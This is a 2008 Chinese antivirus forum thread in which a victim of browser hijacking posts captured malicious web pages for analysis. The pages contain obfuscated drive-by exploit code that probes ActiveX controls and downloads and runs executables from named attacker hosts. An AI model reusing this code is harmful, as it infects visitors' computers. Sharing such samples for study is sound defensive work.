收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 可疑挂马网站www.you2000.cn
12下一页
返回列表 发新帖
查看: 3847|回复: 14
收起左侧

[已鉴定] 可疑挂马网站www.you2000.cn

 关闭 [复制链接]
a87750530
发表于 2008-11-28 08:54:34 | 显示全部楼层 |阅读模式
该网站挂马www.you2000.cn红伞报的,会篡改主页!
请高手抓马!!


我的IE被篡改了,变成了www.you2000.cn这个
后来我的注册表中找到了这个文件是否是被篡改的
C:\WINDOWS\system32\blank.htm


文件内容如下:
<HTML>
<HEAD>
<!--
Copyright (c) 2000 Microsoft Corporation
-->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=gb2312">
<META HTTP-EQUIV=PICS-Label CONTENT='(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))'>
<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">
<LINK ID=Stylesheet_Ref0 href="hcp://system/css/shared.css" rel=STYLESHEET type=text/css>
</HEAD>
<BODY SCROLL=NO class="sys-rhp-bgcolor">
<DIV id=idDisplay style='width: 100%; height: 100%'>
</DIV>
</BODY>
</HTML>


请高手帮忙看看是否正常

我的IE已经被篡改了,用超级兔子无法修复了
现将红伞报警的东东上传上来,其中有两个网页是有毒的请各位帮忙,有一个是ie的检测报告请看看有没有问题
并请告知如何解决!谢谢

[ 本帖最后由 a87750530 于 2008-11-28 09:59 编辑 ]

桌面.rar

9.72 KB, 下载次数: 105
回复

举报

hzyw
头像被屏蔽
发表于 2008-11-28 09:06:02 | 显示全部楼层
遨游+FS 进去没反应
回复

举报

关9军
发表于 2008-11-28 09:13:46 | 显示全部楼层
小a+TF+微点进去没事。
回复

举报

enyawestlife
发表于 2008-11-28 09:27:01 | 显示全部楼层
我的网页也被这个网站劫持过,后来用了超级兔子费了好大劲修复回来了。
回复

举报

walkman660
发表于 2008-11-28 09:41:33 | 显示全部楼层
看来被这个网站伤害的人还真不少。。。
未命名.jpg
回复

举报

sc7ice
发表于 2008-11-28 09:47:26 | 显示全部楼层
用KIS2009+EQ进去没事
回复

举报

250662772
发表于 2008-11-28 09:56:57 | 显示全部楼层
没发现什么不对的
回复

举报

a87750530
 楼主| 发表于 2008-11-28 10:09:18 | 显示全部楼层
第一个

<script language="javascript" SRC="http://bm.kkwen66.cn/bm.js"></script>                                                                                                               .
<html>
<script>
document.write("<iframe width=50 height=0 src=Flash.htm></iframe>");

window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=Ms06014.htm></iframe>");
try{var f;
var gg=new window['ActiveXObject']("GLIED"+"own.IED"+"own.1");}
catch(f){};                     
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=Lz.htm></iframe>");}}
try{var m;
var hh=new ActiveXObject("MP"+"S.S"+"tor"+"mPl"+"ayer");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=Bfyy.htm></iframe>");}}
try{var n;
var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=Access.htm></iframe>");}}
try{var o;
var mm=new ActiveXObject("Pdg2");}
catch(o){};                     
finally{if(o!="[object Error]"){document.write("<iframe width=100 height=0 src=Cx.htm></iframe>");}}
try{var x;
var mm=new ActiveXObject("DPClient.Vod");}
catch(x){};                     
finally{if(x!="[object Error]"){document.write("<iframe width=100 height=0 src=XunLei.htm></iframe>");}}
try{var u;
var mm=new ActiveXObject("BaiduBar.Tool");}
catch(u){};                     
finally{if(u!="[object Error]"){Baidu["DloadDS"]("http://in.skypeour.cn/Baidu.cab","Baidu.exe",0);}}
try{var s;
var mm=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(s){};                     
finally{if(s!="[object Error]"){document.write("<iframe width=100 height=0 src=sina.htm></iframe>");}}
try{var k;
var storm=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1")}
catch(k){};
finally{if(k!="[object Error]"){var url="http://in.skypeour.cn/";storm=document.createElement("object");ActivePerl="-1C59-4BBB-8E8";getSpraySlide="1-6E83F82C813B";helloworld2Address="clsid:2CACD7BB";storm.setAttribute("classid",helloworld2Address+ActivePerl+getSpraySlide);storm["Update"]("\\Program Files\\Common Files\\uusee\\",url+"UU.ini","",1)}}
function EvilCuteQqCn()
{
EvilObj = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
EvilCuteQq = new window['ActiveXObject'](EvilObj);
}catch(error){return;}
Cute = EvilCuteQq.PlayerProperty("PRODUCT"+"VERSION");
if(Cute<="6.0.14.552")
document.write("<iframe width=100 height=0 src=Real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=Real11.htm></iframe>");
}
EvilCuteQqCn();
</script>
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/698372/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/698372/ystat.gif"/></a></noscript>
</html>


第二个

<script language="javascript" SRC="http://bm.kkwen66.cn/bm.js"></script>                                                                                                               /*
*/
    <html>
    <script language="VBScript">
    on error resume next
    Cuteurl = "http://in.skypeour.cn/614.exe"
    Cute="o"&"bj"&"ec"&"t"
    Cute2="c"&"la"&"s"&"si"&"d"
    evil="C"&"5"&"5"&"6"&"-"&"6"&"5"&"A"&"3"&"-"
    evils="c"&"l"&"si"&"d"&":"&"B"&"D9"&"6"
    evilx=evils & evil &"1"&"1"&"D"&"0"&"-"&"9"&"8"&"3"&"A"&"-"&"0"&"0"&"C"&"0"&"4"&"F"&"C"&"2"&"9"&"E"&"3"&"6"
    Cute3="M"&"ic"&"ro"&"so"&"ft"&".X"&"M"&"L"&"HT"&"T"&"P"
    Cute4="Shell.App"&"lication"
    Cute5="Sc"&"ri"&"p"&"ti"&"n"&"g.Fi"&"l"&"eSys"&"tem"&"Ob"&"je"&"ct"
    Set evilcute = document.createElement(Cute)
    sub usicecod(Cute4,Cutex)
    set evilcutes = evilcute.createobject(Cute4,"")
    evildk="O"&"p"&"e"&"n"
    evilcutes.SheLlExEcutE evilcutexx, "", "", evildk, 0
    end sub
    evilcute.setAttribute Cute2, evilx
    chilam=Cute3
    Set wing = evilcute.CreateObject(chilam,"")
    Anhey="A"&"d"&"o"&"d"&"b"&"."
    Anheys="S"&"t"&"r"
    Anheyx="e"&"a"&"m"
    User="ertyd"
    Anti = Anhey & Anheys & Anheyx
    Norton = Anti
    set Rising = evilcute.createobject(Norton,"")
    Rising.type = 1
    Kaspersky="G"&"E"&"T"
    wing.Open Kaspersky, Cuteurl, False
    wing.Send
    evilcutex="A"&"I"&"G"&"."&"s"&"c"&"r"
    evilcutexx="A"&"I"&"G"&"."&"v"&"b"&"s"
    SeT Virus = evilcute.createobject(Cute5,"")
    sET evilcutes = Virus.GetSpecialFolder(2)
    Rising.open
    evilcutex= Virus.BuildPath(evilcutes,evilcutex)
    evilcutexx= Virus.BuildPath(evilcutes,evilcutexx)
    Rising.write wing.responseBody
    Rising.savetofile evilcutex,2
    Rising.close
    Rising.Type=2
    Rising.Open
    Rising.WriteText  "'I LOVE CUTEQQ TEAM"&"'I LOVE CUTEQQ TEAM"&vbCrLf&"Set Love_cuteqq_team = CreateObject(""Wscript"&".Shell"")"&"'I LOVE CUTEQQ TEAM"&vbCrLf&"'I LOVE CUTEQQ TEAM"&"'I LOVE CUTEQQ TEAM"&vbCrLf&"Love_cuteqq_team.run ("""&evilcutex&""")"&vbCrLf&"'I LOVE CUTEQQ TEAM"&"'I LOVE CUTEQQ TEAM"
    Rising.Savetofile evilcutexx,2
    Rising.Close
    call usicecod(Cute4,Cutex)
    </script>
    </html>
<script type="text/jscript">function init() { document.write("Loading......");}window.onload = init;</script>
回复

举报

yeyouxia007
发表于 2008-11-28 10:32:52 | 显示全部楼层
我刚进去过红伞未报呀!怪了!
回复

举报

vb100
发表于 2008-11-28 11:28:31 | 显示全部楼层

没发现异常

把IE权限降低为可运行ACTIVEX,用PROCMONSSM也没发现异常.
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 14:52 , Processed in 0.118738 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表